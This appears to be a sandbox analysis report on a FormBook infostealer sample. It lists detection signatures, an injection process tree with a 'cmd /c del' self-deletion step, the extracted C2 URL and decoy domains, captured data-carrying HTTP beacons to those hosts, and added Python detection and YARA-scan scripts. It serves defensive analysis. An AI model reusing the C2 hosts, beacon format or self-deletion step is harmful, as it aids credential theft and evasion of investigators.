
Windows Analysis Report
2022-571-GLS.exe

Overview

General Information

Sample Name: 2022-571-GLS.exe
Analysis ID: 755996
MD5: 6cc14805bbf5e6bfb4daae5c8a61af7e
SHA1: 34836f2aa6a4e97705352a50d2a7147c857fea94
SHA256: 029d4fe47cb21a8f4e1dbe1863cf43cba6ac777e008b9675d381fda82986196b
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Uses netsh to modify the Windows network and firewall settings
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Process Tree

  • System is w10x64
  • 2022-571-GLS.exe (PID: 5464 cmdline: C:\Users\user\Desktop\2022-571-GLS.exe MD5: 6CC14805BBF5E6BFB4DAAE5C8A61AF7E)
    • jsqqecy.exe (PID: 1236 cmdline: "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up MD5: 07875284CE0A6276F406B25F9E429270)
      • jsqqecy.exe (PID: 1224 cmdline: "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up MD5: 07875284CE0A6276F406B25F9E429270)
        • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • netsh.exe (PID: 6140 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • cmd.exe (PID: 4136 cmdline: /c del "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 4828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
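The chain in the tree above (Temp loader relaunching itself, injected explorer.exe starting a 32-bit netsh.exe from SysWOW64, netsh.exe running cmd.exe /c del on the loader) is what a detection engineer wants to hunt for in process-creation telemetry. The following Python is an added example, not part of the Joe Sandbox report: the events are constructed from the PIDs, images and command lines in the tree, the cmd.exe image path and the parent PID of explorer.exe are assumptions, and the two trailing rows are benign controls.

```python
"""Detect the FormBook process chain from the report's process tree in
process-creation telemetry (Sysmon Event ID 1 or any EDR equivalent).

Only pid, ppid, image and cmdline are used, so the logic ports to whatever
your pipeline exports.
"""
import re

# Constructed events mirroring the report's process tree. PIDs, images and
# command lines come from the tree; the cmd.exe image path and explorer's
# ppid (600) are assumptions; the last two rows are benign controls.
SAMPLE_EVENTS = [
    {"pid": 3528, "ppid": 600, "image": r"C:\Windows\Explorer.EXE",
     "cmdline": r"C:\Windows\Explorer.EXE"},
    {"pid": 5464, "ppid": 3528, "image": r"C:\Users\user\Desktop\2022-571-GLS.exe",
     "cmdline": r"C:\Users\user\Desktop\2022-571-GLS.exe"},
    {"pid": 1236, "ppid": 5464, "image": r"C:\Users\user\AppData\Local\Temp\jsqqecy.exe",
     "cmdline": r'"C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up'},
    {"pid": 1224, "ppid": 1236, "image": r"C:\Users\user\AppData\Local\Temp\jsqqecy.exe",
     "cmdline": r'"C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up'},
    {"pid": 6140, "ppid": 3528, "image": r"C:\Windows\SysWOW64\netsh.exe",
     "cmdline": r"C:\Windows\SysWOW64\netsh.exe"},
    {"pid": 4136, "ppid": 6140, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'/c del "C:\Users\user\AppData\Local\Temp\jsqqecy.exe"'},
    {"pid": 4828, "ppid": 4136, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    # benign controls: a user opening notepad, and cmd deleting a log file
    {"pid": 7000, "ppid": 3528, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"C:\Windows\System32\notepad.exe"},
    {"pid": 7002, "ppid": 3528, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c del "C:\Users\user\Desktop\old.log"'},
]

TEMP_EXE = re.compile(r"\\AppData\\Local\\Temp\\[^\\\"]+\.exe", re.IGNORECASE)
CMD_DEL = re.compile(r"/c\s+del\s+\"?([^\"]+?\.exe)\"?", re.IGNORECASE)


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def lineage(events, pid):
    """Image names from pid up to the highest ancestor present in the events."""
    by_pid = {e["pid"]: e for e in events}
    names = []
    while pid in by_pid:
        names.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return names


def find_formbook_chain(events):
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue
        name, cmd = image_name(e["image"]), e["cmdline"].strip()
        # 1. The Temp-dropped loader starts a second copy of itself with an
        #    identical command line (created suspended in the report, then
        #    used as the host for the unpacked payload).
        if (TEMP_EXE.search(e["image"])
                and parent["image"].lower() == e["image"].lower()
                and parent["cmdline"] == e["cmdline"]):
            findings.append(("loader_relaunches_itself", e["pid"]))
        # 2. explorer.exe starts a WOW64 (32-bit) Windows binary with no
        #    arguments. explorer is 64-bit on w10x64, so a SysWOW64 child is
        #    injected 32-bit code choosing its next host process.
        if (image_name(parent["image"]) == "explorer.exe"
                and "\\syswow64\\" in e["image"].lower()
                and cmd.strip('"').lower() == e["image"].lower()):
            findings.append(("explorer_spawns_wow64_binary", e["pid"]))
        # 3. cmd.exe deleting a Temp executable on behalf of a Windows
        #    binary: the payload erasing the loader after injection.
        m = CMD_DEL.search(cmd)
        if (name == "cmd.exe" and m and TEMP_EXE.search(m.group(1))
                and parent["image"].lower().startswith("c:\\windows\\")):
            findings.append(("windows_binary_deletes_temp_exe", e["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in find_formbook_chain(SAMPLE_EVENTS):
        print(f"{rule:32} pid={pid}  chain={' <- '.join(lineage(SAMPLE_EVENTS, pid))}")
```

Each rule fires on its own, but the three together on one host within seconds are the high-confidence pattern; rule 2 alone is the one most worth alerting on, since a 64-bit explorer.exe has no business launching anything from SysWOW64 without arguments.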

Malware Configuration

{
  "C2 list": ["www.cdlcapitolsolutions.com/b31b/"],
  "decoy": [
    "deltafxtrading.com", "alisonangl.com", "cdfqs.com", "easyentry.vip", "dentalinfodomain.com",
    "hiphoppianyc.com", "pools-62911.com", "supportteam26589.site", "delldaypa.one", "szanody.com",
    "diaper-basket.art", "ffscollab.com", "freediverconnect.com", "namesbrun.com", "theprimone.top",
    "lenzolab.com", "cikmas.com", "genyuei-no.space", "hellofstyle.com", "lamagall.com",
    "hallmarktb.com", "hifebou7.info", "sex5a.finance", "printrynner.com", "powerrestorationllc.com",
    "hirefiz.com", "uninvitedempire.com", "alpinemaintenance.online", "ppcadshub.com", "looking4.tours",
    "dirtyhandsmedia.com", "capishe.website", "cachorrospitbull.com", "mythic-authentication.online",
    "nordingcave.online", "gremep.online", "tryufabetcasino.com", "premiumciso.com", "powerful70s.com",
    "myminecraftrealm.com", "bssurgery.com", "steel-pcint.com", "iokailyjewelry.com", "barmanon5.pro",
    "kcrsw.com", "9393xx38.app", "kochen-mit-induktion.com", "indtradors.store", "giaxevn.info",
    "trungtambaohanhariston.com", "fulili.com", "crgabions.com", "matomekoubou.com", "duaidapduapjdp.site",
    "invissiblefriends.com", "cy3.space", "idqoft.com", "jamal53153.com", "lemagnetix.com",
    "anthroaction.com", "uspcff.top", "supplierdir.com", "counterpoint.online", "zarl.tech"
  ]
}
Source | Rule | Description | Author | Strings
00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
(34 matching memory dumps in total; the remaining entries are not reproduced here)
Source | Rule | Description | Author | Strings
1.2.jsqqecy.exe.1090000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.jsqqecy.exe.1090000.1.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
1.2.jsqqecy.exe.1090000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.jsqqecy.exe.1090000.1.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
2.2.jsqqecy.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
(19 matching unpacked PEs in total; the remaining entries are not reproduced here)

No Sigma rule has matched
No Snort rule has matched
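The two tables list the same string hits at the same offsets in the memory dump and in the unpacked PE, which is what you would expect when the dump is the unpacked payload. The following Python is an added example, not part of the report or of the cited rule sets: it takes the string definitions exactly as shown in the tables and re-checks them with a plain byte search, so a triage box without yara can confirm a fresh dump carries the same markers. The sample dump is constructed (zero-filled, with each pattern written at the reported offsets); point the script at a real .sdmp or unpacked PE to scan that instead.

```python
"""Re-check the report's FormBook YARA string hits with a plain byte scan.

Useful when yara is not installed on the triage box, or to confirm that a
fresh memory dump carries the same markers at the same offsets.
"""
import struct

# String definitions as listed in the report's YARA table: Elastic's
# Windows_Trojan_Formbook_1112e116 ($a1-$a4) and the JPCERT/CC rule's
# three "push imm32" markers. Other FormBook rules can be added the same way.
PATTERNS = {
    "$a1": "3C 30 50 4F 53 54 74 09 40",
    "$a2": "74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55",
    "$a3": "1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01",
    "$a4": "04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83",
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
}

# Offsets the report gives for these strings in the dump / unpacked PE.
REPORTED_OFFSETS = {
    "$a1": [0x6251], "$a2": [0x1CBC0], "$a3": [0xA9CF], "$a4": [0x158B7],
    "$sqlite3step": [0x18849, 0x1895C],
    "$sqlite3text": [0x18878, 0x1899D],
    "$sqlite3blob": [0x1888B, 0x189B3],
}


def to_bytes(hexstr):
    return bytes.fromhex(hexstr.replace(" ", ""))


def scan(buf):
    """Return sorted (offset, name) pairs for every occurrence of every pattern."""
    hits = []
    for name, hexstr in PATTERNS.items():
        needle = to_bytes(hexstr)
        pos = buf.find(needle)
        while pos != -1:
            hits.append((pos, name))
            pos = buf.find(needle, pos + 1)
    return sorted(hits)


def push_imm32(hexstr):
    """Decode a 5-byte 'push imm32' (opcode 0x68) and return the immediate.

    The JPCERT/CC markers are such pushes; their names indicate the constants
    are the hashed names of the sqlite3 routines FormBook resolves when it
    reads browser credential databases, so the value is worth keeping as an
    indicator in its own right."""
    b = to_bytes(hexstr)
    if len(b) != 5 or b[0] != 0x68:
        raise ValueError("not a push imm32")
    return struct.unpack("<I", b[1:])[0]


def build_sample_dump():
    """Constructed stand-in for the dump: zero-filled, with each pattern
    written at the offsets the report lists."""
    buf = bytearray(0x1D000)
    for name, offsets in REPORTED_OFFSETS.items():
        needle = to_bytes(PATTERNS[name])
        for off in offsets:
            buf[off:off + len(needle)] = needle
    return bytes(buf)


def matches_report(buf):
    """True if the scan reproduces exactly the offsets the report lists."""
    expected = sorted((off, n) for n, offs in REPORTED_OFFSETS.items() for off in offs)
    return scan(buf) == expected


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_dump()
    for off, name in scan(data):
        print(f"0x{off:x}  {name}")
    for name in ("$sqlite3step", "$sqlite3text", "$sqlite3blob"):
        print(f"{name}: immediate 0x{push_imm32(PATTERNS[name]):08x}")
```

A dump from a different build will normally hit the same strings at different offsets, so `matches_report` is a same-build check, while `scan` alone is the family check.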

          AV Detection

Source: 2022-571-GLS.exe | ReversingLabs: Detection: 30%
Source: Yara match | File source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: http://www.cdlcapitolsolutions.com/b31b/?8pq=gR42Xd1117OgJS+Outh2bFri+uyQrgf7E7TvWkJgQJ6aRmKfoh8EdM/DtT372TknNdyW&q0DDzX=YreDi | Avira URL Cloud: Label: malware
Source: www.cdlcapitolsolutions.com/b31b/ | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | ReversingLabs: Detection: 19%
Source: 2022-571-GLS.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Joe Sandbox ML: detected
Source: 1.2.jsqqecy.exe.1090000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.jsqqecy.exe.400000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.jsqqecy.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.cdlcapitolsolutions.com/b31b/"], "decoy": ["deltafxtrading.com", "alisonangl.com", "cdfqs.com", "easyentry.vip", "dentalinfodomain.com", "hiphoppianyc.com", "pools-62911.com", "supportteam26589.site", "delldaypa.one", "szanody.com", "diaper-basket.art", "ffscollab.com", "freediverconnect.com", "namesbrun.com", "theprimone.top", "lenzolab.com", "cikmas.com", "genyuei-no.space", "hellofstyle.com", "lamagall.com", "hallmarktb.com", "hifebou7.info", "sex5a.finance", "printrynner.com", "powerrestorationllc.com", "hirefiz.com", "uninvitedempire.com", "alpinemaintenance.online", "ppcadshub.com", "looking4.tours", "dirtyhandsmedia.com", "capishe.website", "cachorrospitbull.com", "mythic-authentication.online", "nordingcave.online", "gremep.online", "tryufabetcasino.com", "premiumciso.com", "powerful70s.com", "myminecraftrealm.com", "bssurgery.com", "steel-pcint.com", "iokailyjewelry.com", "barmanon5.pro", "kcrsw.com", "9393xx38.app", "kochen-mit-induktion.com", "indtradors.store", "giaxevn.info", "trungtambaohanhariston.com", "fulili.com", "crgabions.com", "matomekoubou.com", "duaidapduapjdp.site", "invissiblefriends.com", "cy3.space", "idqoft.com", "jamal53153.com", "lemagnetix.com", "anthroaction.com", "uspcff.top", "supplierdir.com", "counterpoint.online", "zarl.tech"]}
Source: 2022-571-GLS.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: netsh.pdb | source: jsqqecy.exe, 00000002.00000002.381171915.0000000001119000.00000004.00000020.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.383264606.0000000003200000.00000040.10000000.00040000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381214615.0000000001131000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: jsqqecy.exe, 00000001.00000003.299119725.00000000029C0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000001.00000003.299523428.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000003.303967054.0000000001217000.00000004.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381584152.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.382622757.00000000014CF000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.382550493.0000000003384000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.380856964.00000000031ED000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563303711.0000000003520000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563833806.000000000363F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: netsh.pdbGCTL | source: jsqqecy.exe, 00000002.00000002.381171915.0000000001119000.00000004.00000020.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.383264606.0000000003200000.00000040.10000000.00040000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381214615.0000000001131000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: jsqqecy.exe, 00000001.00000003.299119725.00000000029C0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000001.00000003.299523428.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000003.303967054.0000000001217000.00000004.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.381584152.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, jsqqecy.exe, 00000002.00000002.382622757.00000000014CF000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.382550493.0000000003384000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.380856964.00000000031ED000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563303711.0000000003520000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.563833806.000000000363F000.00000040.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\2022-571-GLS.exe | Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\2022-571-GLS.exe | Code function: 0_2_00405FF6 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\2022-571-GLS.exe | Code function: 0_2_00402654 FindFirstFileA,
Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 1_2_00BD52F3 FindFirstFileExW,
Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 1_2_00BD53A7 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_00BD52F3 FindFirstFileExW,
Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 2_2_00BD53A7 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 4x nop then pop esi
Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 4x nop then pop edi

          Networking

Source: C:\Windows\explorer.exe | Domain query: www.easyentry.vip
Source: C:\Windows\explorer.exe | Network Connect: 34.117.168.233 80
Source: C:\Windows\explorer.exe | Network Connect: 45.221.114.43 80
Source: C:\Windows\explorer.exe | Domain query: www.cdlcapitolsolutions.com
Source: C:\Windows\explorer.exe | Network Connect: 75.2.81.221 80
Source: C:\Windows\explorer.exe | Domain query: www.fulili.com
Source: Malware configuration extractor | URLs: www.cdlcapitolsolutions.com/b31b/
Source: Joe Sandbox View | ASN Name: sun-asnSC
Source: Joe Sandbox View | ASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
Source: global traffic | HTTP traffic detected:
  GET /b31b/?8pq=gR42Xd1117OgJS+Outh2bFri+uyQrgf7E7TvWkJgQJ6aRmKfoh8EdM/DtT372TknNdyW&q0DDzX=YreDi HTTP/1.1
  Host: www.cdlcapitolsolutions.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected:
  GET /b31b/?8pq=kQFV/3Ti5731GiKzPcF+l7m9iVSkkn86bXlgwK5ZhVk2Z3fCEdzJJK3qVV3FyS9CSUee&q0DDzX=YreDi HTTP/1.1
  Host: www.easyentry.vip
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected:
  GET /b31b/?8pq=tdO7S/Z/VqUa/I2xC15i+El5qu+HGrTkpc7PSFUM9PDChnmIJTvvTeLkqdaOGaksChda&q0DDzX=YreDi HTTP/1.1
  Host: www.fulili.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View | IP Address: 34.117.168.233
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 403 Forbidden
  Date: Tue, 29 Nov 2022 12:17:37 GMT
  Content-Type: text/html
  Content-Length: 146
  Connection: close
  Server: nginx
  Vary: Accept-Encoding
  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Content-Type: text/html
  Server: Microsoft-IIS/7.5
  X-Powered-By: ASP.NET
  Date: Tue, 29 Nov 2022 12:17:56 GMT
  Connection: close
  Content-Length: 1163
  Data Ascii (gb2312 body decoded from the captured bytes; the capture stops mid-page): <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - 找不到文件或目录。</title><style type="text/css"><!--body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>服务器错误</
  (The Chinese strings are the stock localized IIS 7.5 error page: "404 - File or directory not found." and "Server Error".)
Source: 2022-571-GLS.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 2022-571-GLS.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000003.00000000.364781909.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.317290516.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.347986981.0000000008260000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: unknown | DNS traffic detected: queries for: www.cdlcapitolsolutions.com
Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 1_2_00BCAD00 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard,
Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exe | Code function: 1_2_00BCB890 GetKeyboardState,
